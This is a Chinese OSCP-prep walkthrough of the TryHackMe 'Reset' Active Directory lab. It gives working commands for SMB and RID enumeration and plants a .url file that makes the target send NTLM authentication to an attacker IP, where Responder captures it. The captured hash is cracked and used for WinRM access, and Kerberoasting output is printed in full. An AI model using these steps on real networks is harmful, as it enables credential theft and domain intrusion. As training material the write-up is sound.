tryhackme 记录-域及内网渗透-0x04-Reset(hard)

来源

由于最近在备考 OSCP,在套餐开始前,心里没底,想要先刷一些靶机来练手,所以在网上找到了一份类似 OSCP 靶机的清单

Tryhackme
More guided and friendly approach for some rooms but still great boxes and rooms for prep. Active Directory ones here are very good practice for the OSCP.
Linux Windows Active Directory and Networks Other recommended rooms
Mr Robot(medium) Steel Mountain(easy) Attacktive Directory(medium) SQL Injection Lab(easy)有基础,暂时先跳过
Thompson(easy) Year of the Owl(hard) Attacking Kerberos(easy) Linux Privilege Escalation(medium)
Kenobi(easy) Retro(hard) Wreath Network(easy) Windows Privilege Escalation(medium)
GameZone(easy) Alfred(easy) Reset(hard) Git Happens(官方似乎删除了,没找到)
Skynet(easy) Relevant(medium) Vulnnet: Active NahamStore( medium )有基础,暂时先跳过
Daily bugle(hard) Blueprint(easy) Enterprise
Lazy admin(easy) Hackpark(medium) Ledger
Tomghost(easy) Weasel(官方似乎删除了,没找到) Recommended paths
Rootme(easy) AllSignsPoint2Pwnage Assumed Breach Scenarios: Cyber Security 101
CMesS(medium) Anthem Corp(easy) Jr Penetration Tester
Ultratech(medium) Hack Smarter Security (harder) Lateral Movement and Pivoting Offensive Pentesting
Internal(hard) Cyberlens Exploiting Active Directory
Zeno(medium)
Boiler CTF(medium)
Wonderland(medium)
Silver Platter(easy)
Year of the Jellyfish(hard)

由于机器数量较多,共 47 台,计划一天打 1-2 台,在一个月内打完全部机器。目前已将 Windows、linux、其他推荐练习房间过了一遍(部分房间已经找不到了,部分比较有把握的房间先跳过了),计划开始:域及内网渗透(Active Directory and Networks)部分的练习

0x04-Reset(hard)

简介:

在我们的模拟黑客挑战中,扮演红队成员!
在现实的组织环境中应对最新的防御措施。

测试你的渗透技巧,绕过安全措施,潜入系统。你会在模拟终极组织APT时获胜吗?

找到所有的旗帜!

虚拟机可能完全启动大约需要5分钟。

原文:

Step into the shoes of a red teamer in our simulated hack challenge! 
Navigate a realistic organizational environment with up-to-date defenses. 

Test your penetration skills, bypass security measures, and infiltrate into the system. Will you emerge victorious as you simulate the ultimate organization APT?

Find all the flags!

The VM may take about 5 minutes to completely boot.

设置环境变量

export TARGET=10.48.174.236

工具推荐

这里推荐一个自动信息收集工具,地址,安装过程

sudo apt update

sudo apt install seclists curl dnsrecon enum4linux feroxbuster gobuster impacket-scripts nbtscan nikto nmap onesixtyone oscanner redis-tools smbclient smbmap snmp sslscan sipvicious tnscmd10g whatweb

sudo apt install pipx
pipx ensurepath

pipx install git+https://github.com/Tib3rius/AutoRecon.git

信息搜集

使用 rustscan 和 nmap 进行端口扫描

rustscan -a $TARGET -r 1-65535 --ulimit 500 -- -sC -sV -T3 -Pn

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 126 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-02-24 07:44:36Z)
135/tcp   open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 126
464/tcp   open  kpasswd5?     syn-ack ttl 126
593/tcp   open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 126
3268/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 126
3389/tcp  open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Issuer: commonName=HayStack.thm.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-23T07:10:28
| Not valid after:  2026-08-25T07:10:28
| MD5:     e0de bdfd 82ed 2b1e fdcf 753b 509b 846d
| SHA-1:   1cf1 788c a1df 45d7 de08 6a8e eb25 c9c1 dee6 55d2
| SHA-256: f4b5 7eee c148 32f6 d787 d32d 97c1 4c0f e4a3 f058 e1ce 577b 9b4e 3aa0 319f 169f
| -----BEGIN CERTIFICATE-----
......
|_-----END CERTIFICATE-----
|_ssl-date: 2026-02-24T07:46:13+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: THM
|   NetBIOS_Domain_Name: THM
|   NetBIOS_Computer_Name: HAYSTACK
|   DNS_Domain_Name: thm.corp
|   DNS_Computer_Name: HayStack.thm.corp
|   DNS_Tree_Name: thm.corp
|   Product_Version: 10.0.17763
|_  System_Time: 2026-02-24T07:45:34+00:00
9389/tcp  open  mc-nmf        syn-ack ttl 126 .NET Message Framing
49668/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49675/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49699/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 30370/tcp): CLEAN (Timeout)
|   Check 2 (port 24009/tcp): CLEAN (Timeout)
|   Check 3 (port 46938/udp): CLEAN (Timeout)
|   Check 4 (port 61483/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-02-24T07:45:33
|_  start_date: N/A

根据 nmap 扫描结果,我们需要写入一个 hosts

sudo echo "10.48.174.236 thm.corp" >> /etc/hosts

使用 AutoRecon 一键信息收集

sudo $(which autorecon) 10.48.174.236 --global.domain thm.corp

有点慢,没等到跑完

88 端口利用

尝试枚举用户

kerbrute userenum -d thm.corp --dc $TARGET /usr/share/wordlists/Active-Directory-Wordlists/User.txt -t 5 -o o.txt

只跑出来了 [email protected],尝试拿 hash

impacket-GetNPUsers thm.corp/administrator -no-pass

失败

445 端口利用

SMB 匿名访问

由于开着 SMB,而且还“Message signing enabled and required”

先尝试用 enum4linux 枚举一下

enum4linux -a $TARGET

Domain Name: THM                                                                                                    
Domain Sid: S-1-5-21-1966530601-3185510712-10604624

[+] Server 10.48.174.236 allows sessions using username '', password ''

可以尝试匿名访问列出共享

└─$ smbclient -L //$TARGET/ -N

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.48.174.236 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

看上去我们能进入的只有 Data,因为只有他是一个自定义的共享,连上看看

└─$ smbclient //$TARGET/Data -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Feb 24 03:19:47 2026
  ..                                  D        0  Tue Feb 24 03:19:47 2026
  onboarding                          D        0  Tue Feb 24 03:41:46 2026

                7863807 blocks of size 4096. 3026017 blocks available
smb: \> cd onboarding\
smb: \onboarding\> dir
  .                                   D        0  Tue Feb 24 03:42:16 2026
  ..                                  D        0  Tue Feb 24 03:42:16 2026
  1wvl5mld.myq.txt                    A      521  Mon Aug 21 14:21:59 2023
  c5um0ouh.kpm.pdf                    A  4700896  Mon Jul 17 04:11:53 2023
  twxknluq.t25.pdf                    A  3032659  Mon Jul 17 04:12:09 2023

                7863807 blocks of size 4096. 3025937 blocks available

批量下载文件看看

prompt OFF
recurse ON
mget *

# 批量下载超时了,挨个手动下载看看吧,还是超时,而且发现文件有变化

猜测有程序一直在访问这个共享目录,并对文件做一些操作

爆破 RID

由于存在匿名访问,可以尝试爆一下存在的用户

└─$ crackmapexec smb $TARGET -u 'guest' -p '' --rid-brute

SMB         10.48.174.236   445    HAYSTACK         [*] Windows 10 / Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.48.174.236   445    HAYSTACK         [+] thm.corp\anonymous: (Guest)
SMB         10.48.174.236   445    HAYSTACK         498: THM\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         500: THM\Administrator (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         501: THM\Guest (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         502: THM\krbtgt (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         512: THM\Domain Admins (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         513: THM\Domain Users (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         514: THM\Domain Guests (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         515: THM\Domain Computers (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         516: THM\Domain Controllers (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         517: THM\Cert Publishers (SidTypeAlias)
SMB         10.48.174.236   445    HAYSTACK         518: THM\Schema Admins (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         519: THM\Enterprise Admins (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         520: THM\Group Policy Creator Owners (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         521: THM\Read-only Domain Controllers (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         522: THM\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         525: THM\Protected Users (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         526: THM\Key Admins (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         527: THM\Enterprise Key Admins (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         553: THM\RAS and IAS Servers (SidTypeAlias)
SMB         10.48.174.236   445    HAYSTACK         571: THM\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.48.174.236   445    HAYSTACK         572: THM\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.48.174.236   445    HAYSTACK         1008: THM\HAYSTACK$ (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1109: THM\DnsAdmins (SidTypeAlias)
SMB         10.48.174.236   445    HAYSTACK         1110: THM\DnsUpdateProxy (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         1111: THM\3091731410SA (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1112: THM\ERNESTO_SILVA (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1113: THM\TRACY_CARVER (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1114: THM\SHAWNA_BRAY (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1115: THM\CECILE_WONG (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1116: THM\CYRUS_WHITEHEAD (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1117: THM\DEANNE_WASHINGTON (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1118: THM\ELLIOT_CHARLES (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1119: THM\MICHEL_ROBINSON (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1120: THM\MITCHELL_SHAW (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1121: THM\FANNY_ALLISON (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1122: THM\JULIANNE_HOWE (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1123: THM\ROSLYN_MATHIS (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1124: THM\DANIEL_CHRISTENSEN (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1125: THM\MARCELINO_BALLARD (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1126: THM\CRUZ_HALL (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1127: THM\HOWARD_PAGE (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1128: THM\STEWART_SANTANA (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1130: THM\LINDSAY_SCHULTZ (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1131: THM\TABATHA_BRITT (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1132: THM\RICO_PEARSON (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1133: THM\DARLA_WINTERS (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1134: THM\ANDY_BLACKWELL (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1135: THM\LILY_ONEILL (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1136: THM\CHERYL_MULLINS (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1137: THM\LETHA_MAYO (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1138: THM\HORACE_BOYLE (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1139: THM\CHRISTINA_MCCORMICK (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1141: THM\3811465497SA (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1142: THM\MORGAN_SELLERS (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1143: THM\MARION_CLAY (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1144: THM\3966486072SA (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1146: THM\TED_JACOBSON (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1147: THM\AUGUSTA_HAMILTON (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1148: THM\TREVOR_MELTON (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1149: THM\LEANN_LONG (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1150: THM\RAQUEL_BENSON (SidTypeUser)
SMB         10.48.174.236   445    HAYSTACK         1151: THM\AN-173-distlist1 (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         1152: THM\Gu-gerardway-distlist1 (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         1154: THM\CH-ecu-distlist1 (SidTypeGroup)
SMB         10.48.174.236   445    HAYSTACK         1156: THM\AUTOMATE (SidTypeUser)

把结果写入到一个 o.txt 用命令处理一下,提取用户名,输出到 success_user.txt

grep "SidTypeUser" o.txt | awk -F'\\' '{print $2}' | awk '{print $1}' | sort -u > success_users.txt

# grep "SidTypeUser",避免把组 (SidTypeGroup / SidTypeAlias) 也带进来。
# awk -F'\\' '{print $2}'以\为分隔符
# awk '{print $1}'去掉后面的(SidTypeUser)
# sort -u去重

成功拿到 42 个用户名

初始访问(NTLM 强制认证攻击)

.url 文件结合 responder 获取 NTLM hash

NTLM 强制认证攻击本质是:

利用 SMB 共享的写权限 + Windows 自动认证机制
诱导受害者向攻击者机器发起 NTLM 认证
从而窃取 NTLMv2 Hash

Windows 有一个“特性”:

当用户:

  • 打开 .lnk
  • 打开 Office 文档
  • 浏览包含远程资源的文件
  • 访问 UNC 路径 \\attacker\share

系统会:

👉 自动发送 NTLM 认证

如果攻击者控制了这个地址:

就能抓到 NTLMv2 hash。

由于 smb 连上,发现目标一直有程序在处理该共享文件夹内的文件,这里存在这种可能的攻击方式。

可以尝试创建 lnk 文件(但是需要十六进制写入),利用 Greenwolf 的 ntlm_theft 工具可以完成创建

python3 ntlm_theft.py -g all -s 127.0.0.1 -f test

也可以尝试创建.url 文件,这个比较方便在没有工具的情况下进行创建,因为是纯文本的

# @test.url文件内容
[InternetShortcut]
URL=\\192.168.196.107\test

# 或下面这个版本
[InternetShortcut]
URL=file://192.168.196.107/test

# 或者版本3
[InternetShortcut]
URL=\\192.168.196.107\test
WorkingDirectory=\\192.168.196.107\test
IconFile=\\192.168.196.107\test\icon.ico
IconIndex=1
# 这里我利用第三个成功了

运行监听后,将其上传到目标目录即可

sudo responder -I tun0

解密 hash

echo 'AUTOMATE::THM:deb82c09334924b1:998E750023F967AA30D193ED3850A193:0101000000000000008AFBCF44A5DC01687995EAA23715000000000002000800580034005200430001001E00570049004E002D004D00410046005900300035005A00530045005800430004003400570049004E002D004D00410046005900300035005A0053004500580043002E0058003400520043002E004C004F00430041004C000300140058003400520043002E004C004F00430041004C000500140058003400520043002E004C004F00430041004C0007000800008AFBCF44A5DC010600040002000000080030003000000000000000010000000020000075D5A863D62C9BE6228882B96E64ADF0586189A0422113784683DEB26582ECB40A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390036002E003100300037000000000000000000' > hash.txt

john hash.txt --wordlist=/usr/share/wordlists/Active-Directory-Wordlists/Pass.txt

# 换个字典在跑一下
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

成功跑出来:Passw0rd1 (AUTOMATE)

evil-winrm 连接 shell

由于目标的 5985 端口开放,尝试直接连接

evil-winrm -i $TARGET -u AUTOMATE -p Passw0rd1

拿 user.txt(THM{AUTOMATION_WILL_REPLACE_US})

机器重置

这里由于机器重置,ip 变动,需要重新设置环境变量,修改 hosts

再次信息收集

利用 AUTOMATE 凭证跑 bloodhound

目前已经有一个用户凭证了:AUTOMATE/Passw0rd1

尝试跑寻血猎犬 bloodhound

bloodhound-python -c All -u 'AUTOMATE' -p 'Passw0rd1' -d thm.corp -ns $TARGET --zip

导入后进行分析

  1. 将 AUTOMATE 标记为已拥有

  2. 查到域管的路径

    当前并没有发现有能通向域管的路径

  3. 查域用户到域管的路径

收集其他凭证

用 AUTOMATE 的 bloodhound 查一下 roaste 相关的信息

利用 impacket 进行 Kerberoasting 攻击

Kerberoastable members of Tier Zero / High Value groups 的用户有:MARCELINO_BALLARD、TRACY_CARVER、FANNY_ALLISON、3811465497SA

impacket-GetUserSPNs 'thm.corp/AUTOMATE:Passw0rd1' -request
#默认会全跑一遍,不止高价值目标,可以通过指定-USERSFILE的方式只跑高价值的
impacket-GetUserSPNs 'thm.corp/AUTOMATE:Passw0rd1' -dc-ip $TARGET -request -usersfile highvalue.txt.txt

# 这里我还是选择全跑了,怕漏掉,结果如下
$krb5tgs$23$*MARCELINO_BALLARD$THM.CORP$thm.corp/MARCELINO_BALLARD*$1de4026358f82f250164b9858fcc7807$97fe389c84e059c31e9bd4b0a7d7b5d635ce87a0bf0739b96bb432be45e996b1e54d048f373bb5bbc36a41ac3f859c2d6f85425e3d2fd72cf2dd6a66c30c4222f805b0e85f2a4bd01d18bbab01c97ddf0df0376533c829cac3bfa7208484ed290d82a2702ec39ecb0bb057287ab0ccad3c7f1d8bb28cef373bf10898990f509a01e2def17b04b6a65889b2212deee36ca32c5d19aca11cbc86da0975151f5430df80c1802c2ae53a923a488e967aac53b8cb76c184fc68b754f048575697a6a0fc0309914fd8da2d383b127a33760882a642c635d71314c97e36a4abb62d3e1c784c4d77656c8c9c918d209356c2e39dfc6da38664d275bcc9e5c70a23652203dee4e89c2da5fa5141e73c4fe62636c02b28b404e31f858b01f3080093225e9c7d4add88d6651958a202d7829ad985bcf00419f6bfc30f23bde8ffb97ffda67954d2673e6a2ba3c23f40a53a9b5fc37c1874ae568bff390072e25038af06267e9760b527ebfa4094f1b1e6b2d65737925305afb35642d82f37f4aea3f500cb153ce61d80acb6cf6dc8e13686672e5a39071a01d6be1ab72197e8ff0a8b07c451863d21522412614f8e1f36b96f7e46f4fb4d6f8c3950bfdbca91ad8d229b174134f0794c657cb36ff93231936f4c0e58a1d8cb8931dcde5269e44f824d00bd6f905cd49316d004ae0509d8190c4b6c07f776a70253417414c067717f8062026388b955d8cc067fd13892f6f858acc93f974cda0efd2097802f73aca85c0b27b4488beca4cfca57de421d1c360e02624be71b579c49fd0ecaf997a6075fee7968bcccb21f52bff88e3ed34ebd65277609e521655ffbd22a9062fbbfb4382d9fd5a10bdb7394e09c2dae3f2310b8fb1fc3052495daca0fd3d4c8c4b512149cc239e5f00719e259fa863f3b7c8b340ca45898e6009907aea3c98a27ebae8c3ecffff01b4197424288be801970166972e18d7e0d4c32ca0f0d479736630fdc02fa720c89e44021c5bb0c5750d92fe71f55fadf4fad14d32838c7d8f828a397dc81f2ed52ba974da85ccb6d6a566edbb971b14afa3e8245484d1782ccbbb23de86ce8abc63f8cf8f30554c06163f640cd55da28c481a9db0a98cf1b0ec928a6b0f6df40eb8235cbc313bd83345463d3ef9150c1d2fc4d910e8f36087ea3f8c27b776933d6114c9c89f02088ac11645feb90e35c5af9a19f39a3822087e2a69d645740d443399f8ef45d0c308b15027635cc61f72b273d7e12f80849cc9fe51db1971875d69071b5862649480cd1b65eccfc8888878afe75a8b5a858959e5af1a7d994962672e3a2bfa6bb4aad19506fc22452a3d8290487736c94c2bcd72ee123aec2678cb0d0c81033dcdcc98411a103e8a653e1b3b4b18942a7a1ed5cb7cceb35cc35150e471c9ec15e32d488ef7ef431286888c8a17cfd01f833298888aee352e5b8
$krb5tgs$23$*3811465497SA$THM.CORP$thm.corp/3811465497SA*$1ddb3357ce929b2b6fc976801d3d71c0$60d7b48e4fb44fcdb8ff0144804667483ce88dc819aff2d2ec6ae5c35bbadc60327b49f1480c3702de3dd0c60a3deda11c1ed24d362ba4d0d934c57d903550a4057caedd1aff8973a22d4df125f14c6c6c566aff19a3ee3adfd326b85a43392f3f48f980bb79d03cbe39a7c46f7c5f18b5368343f97ea35d9a6872f0dd677ebf3b88168f60b9be9b692f7cf7b0c030f40c7130b5931ad6dbd2db86033591399cf475a64400352cb776afb7bf41131ce8d2753de322220988c15a8834c6826e2b8045d86f78f5a7f7e7fae8162f6a09f262945a2b3a338b7857142e47024d608899d90aa33d887dbd0ac3747de115f48017f91b3cd9ded3bcc84df8294c9ceb73cb3bbfb38874b4fb278e2468565710004079c0a8d910cc876b96d68cd4c8f1818a6dec7b647182d8e147ce89c1e1b694fc6874fc15d4610e896aa75b7b6d640aa96c0ab01aecc662c4f6d2dcccc2e46d71cb161233abbb7681332e916e78ceda06767a86da1c2fa6c27027d86710747b6c61fcfb6bc90ce9579b796bea4ecaee1ba3b8795b45a9f793652fea83af3748d441af3819fc18898ada79e707095906d17a8329552aa8ace481ea006590cc576dfba748db41270d1bd779fd48060fce95491395402b63e4c32903736b20bf12e3f97ce94afdaa269c811dae2d6730e523230407ad5d2a6ae102c0c156eebe6b21fe2b7fccbc5683f1cd63d8a806aa9955116fb0d4e86689590c1e9876f45d79980dbb3cc24386f16976d1e153d2f32c0fd87a511abb51566174de6a71d5a63d1ebd4c7385315721afacb33bbe4ae856c5925b234950c3a4fbf003eba2cbacee450ca628974f5d6c176f54727c84fd7a5ce82c782af197f983da11a9e2e011ddba5435569bc6f3d025bc6400f1498947cb73af3fdaeecc2a2e0f9caba98724085972395a9973ededec1c8ffeebebf4c1c84330f37e7eb07f55bac4bdd5aa27ca6c107b6aef666c3e66d5dd992b8bd83a9adb7e3c5d54db996b0a7765cdf2b9e78ccec12ab0cb38c75efa3dd5b1c050a8e1152037fe9d46a3839aff49bfda70281b646de85af38547c1d0ece57fe3dc3fc9e70d9d4c146e2a955688a37f813a4a6b1674112338a535113e3fe4d46e067b34ff77cb3775ad824bffcf6f117adf46cb7fb8fdd4fa603f2e53fd4f3925f00a3c265c3389eea73a5d82b3ca2ca3a025e39fb9a7bf943b1932dbef57d79795746172245a2cc8c7b08023682c91f5e528271810147a7cb5f825715e52ecdc92f73894832e48a096e86b5d3fe567f8cc43836751638b0cbf28bf6464d22e000aa1e363c67de0934eb8acd02307a8c08976fabfe34a1342687cbb5fa3178a6290306f0ab6b17c723dbf60c5ac5280a9e02bdfb5baa4637e293d1a604d5866f0deefdd86db09e5be59f6c7f757a349454353b83cbc061881f7632c108a32ed4c37fc67
$krb5tgs$23$*MARION_CLAY$THM.CORP$thm.corp/MARION_CLAY*$58d2fbb4f075244aa048f02f06f7b29a$c6f084b1f32dd2a45fe079cc9206d019b7afe30e9cf05a62ac7a0631f9fc3ec8ff88afd8bca6a4ddb83e3697e9947dd1e09f184b7bf7501eec768b3d0bfc96004f51c46f2e08db1a48aa28cf82c44f6937d992a1e65836de8a0ad610c4b82f0b7cae1b8a652792fbab6b635a099cf45b0ea0d550d6444465127b253fe18d3906e2a75f717da39efa977232cc4269f58bbed18394d740c61b20f46401a7268ea3d32154c6db9b352158e84e8655f33220b28ec34839c054e0bc3185750d45dd10d7edbb3283d5e6cbf7f527d0fd1ca5e6589f280b05ecee3e7fed972e841e779f1f75ef454ae848429fe2f374d3c34e5bc6840d89f1395c24797df8d2b17b8c16aa446b84c1fa2edb991334803f1cdc45f0a429824ec43645e933e95f5eccf94c7fbc5d12c28b1cfb24584d4bc0da4ccb6dbd3ba7a8b21195ac0e0c07dc2026faf4882f03ed6b7f134fbad86afe8501ae341165cfa66102961235fea4dc11f74c92057d325bb26e58634b512f17b349281b8e609ba9b1d8a27cfaa53568bf676a1b0a847d15e657399c7dd2a5a067e5e0b564aef8a746cfab9d017f11b3dc5e9d2d6b9b2c1c5d6bd3b8951e4fd1336e565ddb71827ba63f25a265b69d57262827b3fcbc64f28d82cd05144372eb2f3149faf5ae1e71b45d364341b36720d42f18fd83bb53be41430edd84717547f4786c121832c9d015f7872e36f940ce4354f8c52f3eb4f8edbe383575bc106207806a419b040dca84c68f2a1202a354ab7d32c24a9c6aa6e26b6265a16d495095170d394406f0400ee33274db8dc460553541c6185fca797522c4104f0a96f92485d4e6257d5ec60db8489e07c1eb2ec1dc9899bf55a26188ce027064a0b4a6395ad32e26757b6e2a1176a4cf166d170882099b99ef19b6e4f10811f9c037aded4c9f7635134df7a8c4696fa7b23c6a989800793f63d49719cbedbc29cbffc78bb17bbab02b919e7242510261cfa0840340713d781e3d0c430c0d5a7345e18cb11a93adbf3d789cd584f372563315b5c59c0529081cc0e73399d52a99dd99106002739ab1b8a71790a7865ab1c69ca7e684cc69e257b6e04d00ee08d7dfcae02d300ed3ed7630bc23b47f826017f7d69645a1f0f86bd0d2e842adb47d0cf87ab2862db19458c57899946f718ef8363d8c62b3438f5a6ec4361479960e59dd608aa030eff961cecaec180272354c16133382521715e805eca8d32e23495798bbe46f3cec5c504a1f81088dfd3885917e6ef10d6465bf09d0a8616652ee3cf6694bd5f125d30660df390b161a89db2e59d710a87f09855414d10958fdd90e1c9c160876ca8806c0ea40708cb42b7775e95f64daf4b4bc883217b078f0a91cb42260b7f20e37f908ee3f505af67395f8a8a3caba28c76d7291d370da231e8f7d72829fd74b09b1d373aa21149988d6f6df74f4d548
$krb5tgs$23$*FANNY_ALLISON$THM.CORP$thm.corp/FANNY_ALLISON*$156df5823e57d06e46ff061b1bcab01f$53aa1792b3bfb7ebd7d0524ad49a36a501af7b4c52a0de12321bed408799cd4aa6f23035b1870306177f76b9a8ab93134c9a583f7619ec7150ed6774250a3caea24c9e38777d91a7a3d9b2bf939a01cf9bfa17b889c3ca925bc28339c5f1e4f2f5cfd15732428bd9efb2ba80498bfbe8e3765fa19f455151082e161fe15cc141c078c76ad9ac7004edf2632531fd0ea8959a1fc5462c5aa34fa4d5d3494750c7fff6e4a694add069ba5ee5ec892cd97124c6fe3c556d429bfb8156bbf70d310843ca51c3c90fb014aac9b25deede48b8a17ab782d2f6bf6f61f5130479dd8bae956d1a7025cc80563b1e63fdbaf3035e9aa39c2e4fcff50caed8172d2e554a673ff81f9e84543068e0b0c8c35b92e45aa8d3a30b5d2abf0a8a85e4a4c8f15df4a5054b8c6d69aefc1ce72282cff50037b9cb5ce924c990746dec4b32c2c60aa5b637d9622a2efc8eb12b354440ca4632a8b350abe260befedc06d20c90627c7567a348d94dbd97688729fb20fc4a54cd9459e7f0ac902844c8fb80c36797b5c1c2794b3faf3577801d3bb3f6a4e7971f0bc905055d8e5eba48b1785e55ae6fec1f1ce44ff2c3603a6c08c74856efabb5006d45efaf0e1c17be1f895884428b9aa1fc35c784fefe2d7e17ef878eaf85165031265356454358c499cde19f04118245d5ab729995f8d9401a1458a75ba4c2598be3385d6c97056e330c9b483e0bd92789bde781c5ea40e0b242307d1d4457a936b8658cae8ecdee5ccbd83cb2fe905dfc97ddf0bb1659e6fc4e39b0f0040adc8906c0e18e88a0f65d82dfb68150b7c7d1ce7fcc9440324c01a423c7d6ebfebd67d7a2a4008b49cffcd000e11ab5110a0049516469cb70cccc05e195fb5561a865bc10b9e72c2f077ba0e1920f1fb7f58551c535070539887e7b11d62194741d3095db41f151bac4db69b4ca50c8d5a9a813bd3ba46270baa30d91ae39f9eccbe4033be6b6d7230ce7c84d3ab3dbe96c029831fb7f7c1b66b17d07a84c96bfeda6279caa6a4fa75c9e443a166177c06231911cdd42a638b541723f9e59ef28309bc65712747a2d8efdaff6ed6006439c6e867eb407919d14e299b0119a1f9917f8c009ae99f2bfa471be319f67b675d7ac1c92255e9536d8cf8053cc0cc632c5e180936bb42e5c9ece9fc0bd3f4293eec5cecf05825fabe6c9a61d208a903bb22df1f7f26b964fed955ec2a0ca951622e4edbd1cbf05e61200c7d85a5f8e884b7e64b33f3d13e440a152a77ef86b2365fa72add941e3c8468afc6e8e6baae5b089789d584de7bce989eefdcf1fbb48c6d3de8b56cae7a34a94ba7932b414c6aa948dc0178b3b2bce542aa5665020c9753168f69b48e5199c33f339aee8b463c4e84ca2fbc5d438e13188d4